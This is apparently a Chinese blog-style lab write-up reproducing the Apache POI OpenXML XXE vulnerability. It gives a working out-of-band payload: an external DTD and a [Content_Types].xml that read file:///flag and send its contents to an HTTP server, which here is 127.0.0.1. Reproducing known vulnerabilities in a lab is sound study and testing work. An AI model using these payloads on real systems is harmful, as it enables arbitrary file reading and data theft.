Apache POI 3.10.1 之前的 OPC SAX 设置允许远程攻击者通过 OpenXML 文件读取任意文件,该文件包含与 XML 外部实体 (XXE) 问题相关的 XML 外部实体声明和实体引用。
进入靶场
准备文件和环境
创建一个[Content_Types].xml文件和xxe.dtd文件注意名字不可修改
###xxe.dtd###
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://127.0.0.1/%file;'>">
%all;
###[Content_Types].xml###
<!DOCTYPE ANY [ <!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % dtd SYSTEM "http://127.0.0.1/xxe.dtd">
%dtd; %send;]>
将 [Content_Types].xml文件压缩成zip包,名字任意
?使用python开启一个web服务
?开始复现
难受三天,今天睡个好觉。把靶场关了,跟漏洞说“白白吧”